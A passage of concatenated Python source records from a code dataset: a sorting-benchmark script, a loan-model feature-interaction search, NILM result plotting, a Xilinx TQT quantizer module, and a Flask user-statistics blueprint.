cadena+=str(promedio)+'\\n'\n elif i==2:\n # Compute quicksort on the linked list\n tiempo1=prueba(size,2,1)\n tiempo2=prueba(size,2,1)\n tiempo3=prueba(size,2,1)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+','\n elif i==3:\n # Compute mergesort on the linked list\n tiempo1=prueba(size,2,2)\n tiempo2=prueba(size,2,2)\n tiempo3=prueba(size,2,2)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+'\\n' \"\"\" \n i+=1\n if size==tamano_maximo and i>0:\n archivo.write(cadena)\n size+=1\n elif i>0:\n archivo.write(cadena)\n size*=2\n cadena=str(size)+','\n i=0\n archivo.close()\n\ndef ejecutar_ultima():\n nombre_csv=input(\"Enter the name of the csv file where the data should be saved: \")\n tamano_maximo=int(input('Enter the maximum amount of data to analyze: '))\n archivo=open(nombre_csv,'w')\n #archivo.write('Tamaño,QuickSort-Array,MergeSort-Array,QuickSort-Linked,MergeSort-Linked\\n')\n size = 375942\n cadena=str(size)+','\n tiempo1=prueba(size,1,1)\n tiempo2=prueba(size,1,1)\n tiempo3=prueba(size,1,1)\n 
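# Average the three timed runs to reduce measurement noise.\n 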
promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+','\n tiempo1=prueba(size,1,2)\n tiempo2=prueba(size,1,2)\n tiempo3=prueba(size,1,2)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+'\\n'\n archivo.write(cadena)\n archivo.close()\n\n\ndef iniciar()->None:\n ejecucion=True\n while ejecucion:\n print('1. Run test \\n2. Final test \\n3. Exit')\n opcion=int(input('Select 1, 2 or 3: '))\n if opcion==1:\n ejecutar_prueba()\n elif opcion == 2:\n ejecutar_ultima()\n elif opcion==3:\n ejecucion=False\n\n# Main entry point\niniciar()\n\n\n\n\n\n\n\n ","sub_path":"App/ejecutadordepruebas.py","file_name":"ejecutadordepruebas.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"55631820","text":"\n'''\nImportant notes\n\n1) This algorithm should be run after the feature selection process\n2) The feature descriptions file should be in the working directory. The feature description should have the original feature name and the description of the feature.\nPrecise Column names should be [Feature,Description]\n\n\n'''\n\n\n'''\nInput parameters\n\ndata : full dataset before splitting train and test sets\n\nfeatures_numerical (a list): numerical features should be in a list. Feature names should not be original feature names. They should be transformed names\n\ntarget : specify the name of the target variable\n\ndescription_needed : set this to 1 if you need the descriptions of the features\n\nno_iterations : number of times you need to run this algorithm to identify features which have better predictive power when interacting with another feature\n\nremove_cols : this should be a list. Put all the variables you need to remove before running the algorithm\n\ntrain_testsplit_date : give the date where you need to split training and test. 
Performance after adding interactions is measured on the test set\n\nselected_features : selected features up to this stage\n\n\nfeature_descrption_filename : give the name of the description file as a string\n'''\n\n\n\n\n\nimport datetime\nimport time\nimport pandas as pd\nimport warnings\nimport numpy as np\nwarnings.filterwarnings('ignore')\n\nimport sqlalchemy\nfrom sklearn.preprocessing import Imputer\nfrom sklearn import linear_model\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_auc_score, mean_squared_error\n\nfrom sklearn.grid_search import GridSearchCV \nfrom xgboost import XGBClassifier\n\n\nfrom sklearn import preprocessing\nimport random\n\n\ndef create_2_feature_interactions(data,features_numerical,target,decription_needed,no_iterations\n ,remove_cols,train_testsplit_date,selected_features,feature_descrption_filename) :\n \n\n\n\n def get_oroginal_feature(x):\n \n \n if 'log' in x:\n \n x=x[:-4]\n \n \n \n \n if 'Zero' in x:\n\n return x[:-5]\n\n elif 'Median' in x:\n return x[:-7]\n\n else:\n return x\n \n \n else:\n \n if 'Zero' in x:\n\n return x[:-5]\n\n elif 'Median' in x:\n return x[:-7]\n\n else:\n return x\n\n\n def get_description(x):\n df_description2=df_description[df_description['Feature']==x].reset_index(drop=True)\n\n return df_description2.iloc[0][1]\n\n\n\n \n #df_coef.loc[:,'Feature_Original'] = [i.split('_')[0] for i in df_coef.Feature]\n selected_feats=selected_features\n \n \n\n X_final_all2=data\n \n \n \n \n AUC_withOld=[]\n AUC_onlyNew=[]\n FEATS=[]\n feat1=[]\n feat2=[]\n \n\n\n for i in range(0,no_iterations):\n random_two=random.sample(set(features_numerical), 2)\n\n X_final_all2[random_two[0]+\"$\"+random_two[1]]=X_final_all2[random_two[0]] * X_final_all2[random_two[1]]\n\n selected_feats2=selected_feats+[(random_two[0]+\"$\"+random_two[1])]\n \n train=X_final_all2[X_final_all2['LoanApplicationDateKey']<train_testsplit_date ]\n \n test=X_final_all2[X_final_all2['LoanApplicationDateKey']>=train_testsplit_date ]\n \n for i in remove_cols:\n try:\n del train[i]\n except:\n continue\n \n for i in remove_cols:\n try:\n del test[i]\n except:\n continue\n train1=train.copy()\n test1=test.copy()\n \n \n y = train1[target]\n y_test = test1[target]\n\n \n\n\n del train1[target]\n del test1[target]\n\n \n\n lr_model =linear_model.LogisticRegression(class_weight={0: 1,1:1})##,\n \n\n lr_model.fit(train1[selected_feats2], y)\n\n\n import math \n probclf=[]\n \n for a, b in lr_model.predict_proba(test1[selected_feats2]):\n probclf.append(b)\n\n val_pred_xgb_probxgb= probclf\n auc1 = roc_auc_score(y_test, val_pred_xgb_probxgb)\n\n FEATS.append(random_two[0]+\"$\"+random_two[1])\n AUC_withOld.append(auc1)\n\n\n\n train2=train.copy()\n test2=test.copy()\n\n\n y = train2[target]\n y_test = test2[target]\n\n \n\n\n del train2[target]\n del test2[target]\n \n try:\n\n selected_feats2.remove(random_two[0])\n\n except:\n pass\n\n try:\n selected_feats2.remove(random_two[1])\n\n except:\n pass\n\n lr_model =linear_model.LogisticRegression(class_weight={0: 1,1:1})##,\n # Refit after removing the two interacting source features\n\n lr_model.fit(train2[selected_feats2], y)\n\n\n import math \n probclf=[]\n for a, b in lr_model.predict_proba(test2[selected_feats2]):\n probclf.append(b)\n\n val_pred_xgb_probxgb= probclf\n auc2 = roc_auc_score(y_test, val_pred_xgb_probxgb)\n AUC_onlyNew.append(auc2)\n\n feat1.append(random_two[0])\n feat2.append(random_two[1])\n \n \n 
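# Assemble one row per sampled pair: the interaction feature name, the test AUC with the original features kept, the test AUC with them removed, and the two source features.\n 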
df_interactions=pd.DataFrame()\n df_interactions['new_feature']=FEATS\n df_interactions['AUC_withOld']=AUC_withOld\n df_interactions['AUC_onlyNew']=AUC_onlyNew\n df_interactions['feat1']=feat1\n df_interactions['feat2']=feat2\n \n df_interactions['Feature1_Original'] = df_interactions['feat1'].map(get_oroginal_feature) \n df_interactions['Feature2_Original'] = df_interactions['feat2'].map(get_oroginal_feature) \n \n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H_%M_%S')\n st=str(st).replace(\" \", \"_\")\n \n if decription_needed==1:\n \n df_description = pd.read_csv(feature_descrption_filename,encoding='ISO-8859-1')\n\n df_interactions['feat1_desc']=df_interactions['Feature1_Original'].map(get_description) \n df_interactions['feat2_desc']=df_interactions['Feature2_Original'].map(get_description) \n \n df_interactions.to_csv('interactions'+'_'+st+'_'+str(no_iterations)+'.csv')\n \n return df_interactions\n \n","sub_path":"FeatureInteractions.py","file_name":"FeatureInteractions.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"38025449","text":"import os\nimport re\nfrom itertools import groupby\nfrom operator import itemgetter\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n\nsns.set_style('white')\n\npath_main = os.path.realpath(__file__)\npath_main = path_main.rsplit('/', 2)[0]\n\nPATH_DATA = os.path.join(path_main, 'data')\nPATH_OUTPUT = os.path.join(path_main, 'outputs')\n\nDICT_APPLIANCES = {'dish_washer': 'Dishwasher',\n 'fridge': 'Fridge',\n 'washing_machine': 'Washing machine'}\nDICT_MAE_LIM = {'Dishwasher': [5, 25],\n 'Fridge': [20, 35],\n 'Washing machine': [10, 45]}\nF1_LIM = [.5, 1]\n\n\ndef list_dir_sorted(path_input, model):\n files = []\n for i in os.listdir(path_input):\n if (os.path.isdir(os.path.join(path_input, i))\n and model in i):\n files.append((os.path.join(path_input, i),\n float(re.search('clas_(.*)_reg', i).group(1))))\n files.sort(key=lambda tup: tup[1])\n return files\n\n\ndef list_scores(path_dir):\n list_scores_txt = []\n for i in os.listdir(path_dir):\n if (os.path.isfile(os.path.join(path_dir, i))\n and 'scores_' in i):\n list_scores_txt.append(os.path.join(path_dir, i))\n return list_scores_txt\n\n\ndef extract_scores_from_file(path_file):\n with open(path_file, 'r') as search:\n next_line_is = None\n approach = None\n appliance = None\n scores = {}\n for line in search:\n line = line.rstrip()\n if line.startswith('==='):\n next_line_is = 'approach'\n approach = None\n elif line.startswith('---'):\n next_line_is = 'appliance'\n appliance = None\n elif next_line_is == 'approach':\n approach = line\n scores[approach] = {}\n next_line_is = None\n elif next_line_is == 'appliance':\n appliance = line\n scores[approach][appliance] = {}\n next_line_is = 'score'\n elif next_line_is == 'score':\n key = line.split(': ', 1)[0]\n value = float(line.split(': ', 1)[1])\n scores[approach][appliance][key] = value\n return scores\n\n\ndef get_f1_mae_from_scores(list_scores_txt):\n list_f1 = []\n list_mae = []\n for path_file in list_scores_txt:\n dict_scores = extract_scores_from_file(path_file)\n # Include F1 from classification\n # If missing, get F1 from regression\n if 'classification' in dict_scores.keys():\n for app, dic in dict_scores['classification'].items():\n list_f1.append((app, dic['f1']))\n elif 'regression' in dict_scores.keys():\n for app, dic in dict_scores['regression'].items():\n 
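# Record one (appliance, F1) pair per appliance listed in this scores file.\n                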
list_f1.append((app, dic['f1']))\n # Include MAE from regression\n # If missing, get MAE from classification\n if 'regression' in dict_scores.keys():\n for app, dic in dict_scores['regression'].items():\n list_mae.append((app, dic['mae']))\n elif 'classification' in dict_scores.keys():\n for app, dic in dict_scores['classification'].items():\n list_mae.append((app, dic['mae']))\n list_f1.sort(key=lambda tup: tup[0])\n dict_f1 = dict([(k, list(list(zip(*g))[1]))\n for k, g in groupby(list_f1, itemgetter(0))])\n list_mae.sort(key=lambda tup: tup[0])\n dict_mae = dict([(k, list(list(zip(*g))[1]))\n for k, g in groupby(list_mae, itemgetter(0))])\n return dict_f1, dict_mae\n\n\ndef get_arrays(list_values):\n w = np.zeros(len(list_values))\n mean = np.zeros(len(list_values))\n std = np.zeros(len(list_values))\n for i, (weight, values) in enumerate(list_values):\n w[i] = weight\n mean[i] = np.mean(values)\n std[i] = np.std(values)\n return w, mean, std\n\n\ndef moving_average(a, n=3):\n ret = np.cumsum(a)\n ret[n:] = ret[n:] - ret[:-n]\n ret[n - 1:] = ret[n - 1:] / n\n return ret\n\n\ndef subplot_f1(ax, w, y, std, ignore_extreme, f1_lim=F1_LIM):\n color = 'tab:red'\n ax.set_xlabel('Classification weight')\n ax.set_ylabel('F1', color=color)\n up = y + std\n down = y - std\n if ignore_extreme or w.min() != 0:\n ax.plot(w[1:], y[1:], color=color)\n ax.fill_between(w[1:], down[1:], up[1:],\n color=color, alpha=0.2)\n else:\n ax.plot(w[1:], y[1:], color=color)\n ax.fill_between(w[1:], down[1:], up[1:],\n color=color, alpha=0.2)\n ax.errorbar(w[0], y[0], std[0], color=color,\n linestyle='None', marker='.')\n ax.tick_params(axis='y', labelcolor=color)\n ax.grid(axis='y')\n ax.grid(axis='x')\n if f1_lim is not None:\n ax.set_ylim(f1_lim)\n return ax\n\n\ndef subplot_mae(ax, w, y, std, ignore_extreme, app,\n dict_mae_lim=DICT_MAE_LIM):\n color = 'tab:blue'\n ax.set_ylabel('MAE (watts)',\n color=color) # we already handled the x-label with ax1\n up = y + std\n down = y - std\n if ignore_extreme or w.max() != 1:\n ax.plot(w[:-1], y[:-1], color=color)\n ax.fill_between(w[:-1], down[:-1], up[:-1],\n color=color, alpha=0.2)\n else:\n ax.plot(w[:-1], y[:-1], color=color)\n ax.fill_between(w[:-1], down[:-1], up[:-1],\n color=color, alpha=0.2)\n ax.errorbar(w[-1], y[-1], std[-1], color=color,\n linestyle='None', marker='.')\n ax.tick_params(axis='y', labelcolor=color)\n mae_lim = dict_mae_lim.get(app, None)\n if mae_lim is not None:\n ax.set_ylim(dict_mae_lim[app])\n return ax\n\n\ndef plot_arrays(w_f1, f1, f1_std, w_mae, mae, mae_std,\n app, model, dict_mae_lim=DICT_MAE_LIM, f1_lim=F1_LIM,\n movavg=1, ignore_extreme=True, figsize=(6, 4),\n savefig=None):\n app = DICT_APPLIANCES.get(app, app)\n if movavg > 1:\n f1 = moving_average(f1, n=movavg)\n mae = moving_average(mae, n=movavg)\n\n fig, ax1 = plt.subplots(figsize=figsize)\n\n ax1 = subplot_f1(ax1, w_f1, f1, f1_std, ignore_extreme, f1_lim=f1_lim)\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n ax2 = subplot_mae(ax2, w_mae, mae, mae_std, ignore_extreme, app,\n dict_mae_lim=dict_mae_lim)\n\n ax1.set_title(model + ' ' + app)\n fig.tight_layout() # otherwise the right y-label is slightly clipped\n if savefig is None:\n plt.show()\n else:\n plt.savefig(savefig)\n\n\ndef plot_weights(path_input: str, app: str,\n dict_mae_lim=DICT_MAE_LIM, f1_lim=F1_LIM,\n model: str = 'seq_480_1min', movavg: int = 1,\n ignore_extreme: bool = False, figsize=(8, 4),\n savefig=None):\n assert os.path.isdir(path_input)\n\n # List files and sort by class 
weight\n files = list_dir_sorted(path_input, model)\n\n list_f1 = []\n list_mae = []\n\n for path_dir, clas_w in files:\n list_scores_txt = list_scores(path_dir)\n dict_f1, dict_mae = get_f1_mae_from_scores(list_scores_txt)\n if app in dict_f1.keys():\n list_f1.append((clas_w / 100, dict_f1[app]))\n if app in dict_mae.keys():\n list_mae.append((clas_w / 100, dict_mae[app]))\n\n # Build arrays\n w_f1, f1, f1_std = get_arrays(list_f1)\n w_mae, mae, mae_std = get_arrays(list_mae)\n\n # Plot arrays\n model = path_input.rsplit('/', 1)[1]\n model = model[:-5]\n plot_arrays(w_f1, f1, f1_std, w_mae, mae, mae_std,\n app, model, dict_mae_lim=dict_mae_lim, f1_lim=f1_lim,\n movavg=movavg, ignore_extreme=ignore_extreme,\n figsize=figsize, savefig=savefig)\n","sub_path":"better_nilm/plot_output.py","file_name":"plot_output.py","file_ext":"py","file_size_in_byte":7813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"378695199","text":"# Copyright 2019 Xilinx Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom pytorch_nndct.nn.modules import fix_ops\nfrom pytorch_nndct.nn.quantization.ops import tqt_ops\n\nclass FakeQuantizer(nn.Module):\n \"\"\"Simulate the quantize and dequantize operations in training time.\n\n In general, the output of this module is given by\n x_out = (clamp(round(x / scale + zero_point), quant_min, quant_max) - zero_point) * scale\n See https://arxiv.org/pdf/1903.08066.pdf\n\n In nndct, we use symmetric quantization and power-of-2 scaling. 
That is,\n    zero_point = 0,\n    quant_min = -2^(bitwidth - 1),\n    quant_max = 2^(bitwidth - 1) - 1\n  \"\"\"\n  _version = 2\n\n  def __init__(self, bitwidth):\n    super(FakeQuantizer, self).__init__()\n    # quant_enabled is registered as a buffer to support its replication in DDP.\n    # Data type is uint8 because NCCL does not support bool tensors.\n    self.register_buffer('quant_enabled', torch.tensor([1], dtype=torch.uint8))\n    self.register_buffer('bitwidth', torch.tensor([bitwidth],\n dtype=torch.uint8))\n    self.register_buffer('domain', torch.tensor([2**(bitwidth - 1)]).float())\n\n  def forward(self, x):\n    raise NotImplementedError(\n        'Do not use FakeQuantizer directly, please use its derivatives.')\n\n  # PyTorch has been using _save_to_state_dict since 1.2.0.\n  # See https://github.com/pytorch/pytorch/blob/v1.2.0/torch/nn/modules/module.py.\n  def _save_to_state_dict(self, destination, prefix, keep_vars):\n    super(FakeQuantizer, self)._save_to_state_dict(destination, prefix,\n keep_vars)\n    destination.pop(prefix + 'quant_enabled')\n    destination.pop(prefix + 'domain')\n\n  def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n    # We save 'bitwidth' to the state_dict but do not load it.\n    # In low-bit training, bitwidth incrementally decreases from 8 -> 6 -> 4.\n    # So the bitwidth should be taken from the quantizer's initialization argument\n    # instead of the state dict.\n\n    # For checkpoint BC with version 1.\n    replace_map = {'num_bits': 'bitwidth'}\n\n    version = local_metadata.get('version', None)\n    if version is None or version < 2:\n      keys = list(state_dict.keys())\n      for key in keys:\n        key_parts = key.split('.')\n        weight_name = key_parts[-1]\n        if weight_name in replace_map:\n          key_parts[-1] = replace_map[weight_name]\n          new_key = '.'.join(key_parts)\n          assert new_key not in state_dict\n          state_dict[new_key] = state_dict[key]\n          state_dict.pop(key)\n\n    # Check if bitwidth is in the state dict, but do not load it.\n    missing_bitwidth = False\n    bitwidth_key = prefix + 'bitwidth'\n    if bitwidth_key not in state_dict:\n      missing_bitwidth = True\n    else:\n      # The value of bitwidth should be set at initialization.\n      state_dict.pop(bitwidth_key)\n\n    super(FakeQuantizer,\n self)._load_from_state_dict(state_dict, prefix, local_metadata,\n strict, missing_keys, unexpected_keys,\n error_msgs)\n    ignored_params = ['bitwidth', 'quant_enabled', 'domain']\n    ignored_keys = [prefix + name for name in ignored_params]\n    for key in ignored_keys:\n      if key in missing_keys:\n        if key == bitwidth_key and missing_bitwidth:\n          continue\n        missing_keys.remove(key)\n      else:\n        print('[WARNING] Unexpected key in state dict:', key)\n\nclass TQTQuantizer(FakeQuantizer):\n\n  def __init__(self, bitwidth, tensor_type, method = None):\n    super(TQTQuantizer, self).__init__(bitwidth)\n\n    valid_tensor_types = ['weight', 'act']\n    if tensor_type not in valid_tensor_types:\n      raise ValueError(\n          \"'tensor_type' must be one of {}\".format(valid_tensor_types))\n    self.tensor_type = tensor_type\n\n    # See TorchQuantizer::quantize() in quantization/torchquantizer.py\n    if method is not None:\n      self.method = method\n    else:\n      self.method = 3 if tensor_type == 'weight' else 2\n    self.quantize_fn_cls = tqt_ops.TQTQuantize\n\n    self.log_threshold = nn.Parameter(torch.tensor([0.0]))\n    self.register_buffer('warmup_enabled', torch.tensor([1], dtype=torch.uint8))\n\n    self._forward_fn = self._quantize_with_warmup\n\n  def _init_threshold(self, x):\n    \"\"\"See Table 2 in https://arxiv.org/pdf/1903.08066.pdf\"\"\"\n\n    def _max(x):\n      return 
np.max(np.abs(x))\n\n def _3sd(x):\n y = x.astype(np.float32) if x.dtype == np.float16 else x\n return np.abs(np.mean(y + 1e-6)) + 3 * np.std(y)\n\n def _kl_j(x):\n \"\"\"\n Ref paper (Algorithm 1):\n \"Quantizing Convolutional Neural Networks for Low-Power\n High-Throughput Inference Engines\" - Sean Settle et al.\n https://arxiv.org/pdf/1805.07941.pdf\n \"\"\"\n\n def calculate_kl_j(x, y):\n return np.sum((x - y) * np.log2(x / y))\n\n mn = 0\n mx = np.max(np.abs(x))\n y = x.astype(np.float32) if x.dtype == np.float16 else x\n hist, bin_edges = np.histogram((np.abs(y)),\n 'sqrt',\n range=(mn, mx),\n density=True)\n hist = hist.astype(x.dtype)\n bin_edges = bin_edges.astype(x.dtype)\n pdf = hist / np.sum(hist)\n cdf = np.cumsum(pdf)\n n = pow(2, self.bitwidth.item() - 1)\n threshold = []\n d = []\n if n + 1 > len(bin_edges) - 1:\n return bin_edges[(-1)]\n else:\n for i in range(n + 1, len(bin_edges), 1):\n threshold_tmp = (i + 0.5) * (bin_edges[1] - bin_edges[0])\n threshold = np.concatenate((threshold, [threshold_tmp]))\n p = np.copy(cdf)\n p[i - 1:] = 1\n x = np.linspace(0.0, 1.0, n)\n xp = np.linspace(0.0, 1.0, i)\n fp = p[:i]\n p_interp = np.interp(x, xp, fp)\n x = np.linspace(0.0, 1.0, i)\n xp = np.linspace(0.0, 1.0, n)\n fp = p_interp\n q_interp = np.interp(x, xp, fp)\n q = np.copy(p)\n q[:i] = q_interp\n d_tmp = calculate_kl_j(cdf[np.nonzero(cdf)], q[np.nonzero(cdf)])\n d = np.concatenate((d, [d_tmp]))\n\n return threshold[np.argmin(d)]\n\n init_scheme = {'weight': _3sd, 'act': _kl_j}\n #init_scheme = {'weight': _max, 'act': _kl_j}\n data = x.detach().cpu().numpy()\n th = init_scheme[self.tensor_type](data)\n # TODO(yuwang): Check if th < 0.\n return torch.tensor([th], dtype=x.dtype, device=x.device)\n\n def _forward_pass_input(self, x, log_threshold, domain, method):\n return x\n\n def _quantize(self, x, log_threshold, domain, method):\n return self.quantize_fn_cls.apply(x, log_threshold, domain,\n method)\n def _quantize_with_warmup(self, x, log_threshold, domain, method):\n self.disable_warmup()\n log_threshold.data[0] = torch.log2(self._init_threshold(x))[0]\n return self._quantize(x, log_threshold, domain, method)\n\n def forward(self, x):\n #if self.quant_enabled[0] == 0:\n # return x\n\n #if self.warmup_enabled[0] == 1:\n # self.warmup_enabled[0] = 0\n # threshold = self._init_threshold(x)\n # self.log_threshold.data = torch.log2(threshold)\n\n #return self.quantize_fn_cls.apply(x, self.log_threshold, self.domain,\n # self.method)\n return self._forward_fn(x, self.log_threshold, self.domain, self.method)\n\n def enable_quant(self, enabled=True):\n self.quant_enabled[0] = 1 if enabled else 0\n\n if enabled:\n self._forward_fn = self._quantize_with_warmup if self.warmup_enabled[\n 0] == 1 else self._quantize\n else:\n self._forward_fn = self._forward_pass_input\n return self\n\n def disable_quant(self):\n return self.enable_quant(False)\n\n def enable_warmup(self, enabled=True):\n self.warmup_enabled[0] = 1 if enabled else 0\n self._forward_fn = self._quantize_with_warmup if enabled else self._quantize\n return self\n\n def disable_warmup(self):\n return self.enable_warmup(False)\n\n def is_warmup_enabled(self):\n return self.warmup_enabled[0] == 1\n\n def freeze_quant(self, frozen=True):\n self.log_threshold.requires_grad = (not frozen)\n\n def unfreeze_quant(self):\n self.freeze_quant(False)\n\n def extra_repr(self):\n return 'quant_enabled={}, bitwidth={}, method={}'.format(\n self.quant_enabled, self.bitwidth, self.method)\n\n def _save_to_state_dict(self, destination, 
prefix, keep_vars):\n super(TQTQuantizer, self)._save_to_state_dict(destination, prefix,\n keep_vars)\n\n def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n super(TQTQuantizer,\n self)._load_from_state_dict(state_dict, prefix, local_metadata,\n strict, missing_keys, unexpected_keys,\n error_msgs)\n self._forward_fn = self._quantize_with_warmup if self.warmup_enabled[\n 0] == 1 else self._quantize\n if self.quant_enabled[0] == 0:\n self._forward_fn = self._forward_pass_input\n\n def export_quant_info(self):\n \"\"\"Export trained threshold to TorchQuantizer's quant info [bitwidth, fp].\n\n (1) TQT: qx = clip(round(fx / scale)) * scale, scale = 2^ceil(log2t) / 2^(b-1)\n (2) NndctFixNeron: qx = clip(round(fx * scale)) * (1 / scale), scale = 2^fp\n Let (1) equals (2), we can get\n (3): 2^(b-1) / 2^ceil(log2t) = 2^fp\n => fp = b - 1 - ceil(log2t)\n\n For more details, see nndct/include/cuda/nndct_fix_kernels.cuh::_fix_neuron_v2_device\n \"\"\"\n bitwidth = self.bitwidth.item()\n ceil_log2t = torch.ceil(self.log_threshold).item()\n return [[bitwidth, int(bitwidth - 1 - ceil_log2t)]]\n\n def import_quant_info(self, qinfo):\n bitwidth, fp = qinfo\n self.bitwidth[0] = bitwidth\n self.log_threshold.data = torch.tensor([bitwidth - 1 - fp],\n dtype=self.log_threshold.dtype)\n self.disable_warmup()\n\ndef enable_quant(mod):\n if isinstance(mod, FakeQuantizer):\n mod.enable_quant()\n\ndef disable_quant(mod):\n if isinstance(mod, FakeQuantizer):\n mod.disable_quant()\n\ndef enable_warmup(mod):\n if isinstance(mod, TQTQuantizer):\n mod.enable_warmup()\n\ndef disable_warmup(mod):\n if isinstance(mod, TQTQuantizer):\n mod.disable_warmup()\n\ndef freeze_quant(mod):\n if isinstance(mod, TQTQuantizer):\n mod.freeze_quant()\n\ndef unfreeze_quant(mod):\n if isinstance(mod, TQTQuantizer):\n mod.unfreeze_quant()\n","sub_path":"src/vai_optimizer/pytorch_binding/pytorch_nndct/nn/quantization/modules/tqt.py","file_name":"tqt.py","file_ext":"py","file_size_in_byte":11249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"234377173","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for, jsonify\n)\nimport pandas as pd\nfrom werkzeug.exceptions import abort\n\nfrom .auth import login_required\nfrom .db import get_db, query_db\nfrom . import team\n\nbp = Blueprint('user', __name__, url_prefix='/user')\n\n@bp.route(\"/\")\n@login_required\ndef home():\n edit_button = \"\"\n df = pd.read_sql_query('SELECT id, first_name, surname, permission_level FROM user', get_db())\n df.columns = ['ID', 'First Name', 'Surname', 'Permission Level']\n df['Edit'] = edit_button\n return render_template('postal/all_users.html', tables=[df.to_html(classes='table results user', border=0, index=False, index_names=False, escape=False)], titles=df.columns.values)\n\n@bp.route(\"/\", methods=['GET', 'POST'])\n@login_required\ndef specific_user(user_id):\n if request.method == 'GET':\n sql = 'SELECT * FROM user WHERE id = ?'\n user = query_db(sql, [user_id], one=True)\n\n return render_template('postal/user.html', user_data=user)\n elif request.method == 'POST':\n #id = request.form['u_id']\n first_name = request.form['first_name']\n surname = request.form['surname']\n username = request.form['username']\n permission_level = request.form['permission_level']\n sql = 'UPDATE user SET first_name=?, surname=?, username=?, permission_level=? 
WHERE id = ?'\n db = get_db()\n db.execute(sql, [first_name, surname, username, permission_level, user_id])\n db.commit()\n flash('{} {} has been updated.'.format(first_name, surname))\n return redirect(url_for('user.home'))\n\n@bp.route(\"/create\", methods=['GET', 'POST'])\n@login_required\ndef create_user():\n if request.method == 'POST':\n #id = request.form['u_id']\n first_name = request.form['first_name']\n surname = request.form['surname']\n username = request.form['username']\n sql = 'INSERT INTO user (first_name, surname, username) VALUES (?,?,?)'\n db = get_db()\n db.execute(sql, [first_name, surname, username])\n db.commit()\n flash('{} {} has been created.'.format(first_name, surname))\n return redirect(url_for('user.home'))\n else:\n return render_template('postal/create_user.html', user_data=None)\n\n\n@bp.route(\"//stats\", methods=['GET'])\ndef user_stats(user_id):\n sel_options = query_db(\"\"\"SELECT compTeam.competition_id as id\n , competition_name as name\n , season\n FROM teamMembers\n JOIN compTeam \n ON compTeam.team_id = teamMembers.team_id\n JOIN competitions \n ON compTeam.competition_id = competitions.id\n WHERE user_id = ?\n ORDER BY season desc\"\"\", [str(user_id)])\n user_details = query_db(\"SELECT * FROM user WHERE id = ?\", [str(user_id)], one=True)\n fixed_avgs = query_db(\"\"\"\nSELECT\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? ORDER BY scores.completed DESC LIMIT 6)) AS six_cards,\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? ORDER BY scores.completed DESC LIMIT 12)) AS twelve_cards,\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? AND completed BETWEEN date('now', '-28 days') AND date('now'))) as four_weeks,\n (SELECT AVG(result) FROM (SELECT result FROM scores WHERE user_id = ? AND completed BETWEEN date('now', '-2 months') AND date('now'))) as two_months\n \"\"\", [str(user_id), str(user_id), str(user_id), str(user_id)], one=True)\n if request.method == 'GET':\n if request.args and request.args.get('comp_id') > '0':\n graph_data = user_comp_stats(user_id=user_id, comp_id=request.args.get('comp_id'))\n else:\n graph_data = previous_round_results(user_id=user_id, rounds=12)\n\n return render_template('postal/user_stats.html', user=user_details, avgs=fixed_avgs, user_comps=sel_options, graph_data=graph_data)\n\n\n@bp.route(\"//prev_results/\", methods=['GET', 'POST'])\ndef previous_round_results(user_id, rounds=12):\n print(\"user_id\", user_id)\n data_set = query_db(\"\"\"\n SELECT \n result, first_name, surname\n FROM\n scores\n JOIN user ON user.id = scores.user_id\n WHERE user_id = ?\n --ORDER BY scores.completed DESC \n LIMIT ? \n \"\"\", (user_id, rounds))\n results = []\n for val in data_set:\n results += [val['result']]\n data = {\n 'comp_id': 0,\n 'shooter': data_set[0]['first_name'] + \" \" + data_set[0]['surname'],\n 'rounds': [r for r, idx in enumerate(range(len(data_set)), start=1)],\n 'results_arr':results,\n 'average' : [(sum(results) / len(results)) for avg in range(len(data_set))]\n }\n return data\n\n\n@bp.route(\"//stats/\", methods=['GET', 'POST'])\ndef user_comp_stats(user_id, comp_id):\n print(\"user_id\", user_id, \"comp_id\", comp_id)\n data_set = query_db(\"\"\"\n SELECT \n result, first_name, surname\n FROM\n scores\n JOIN user \n ON user.id = scores.user_id \n WHERE user_id=? AND competition_id=? 
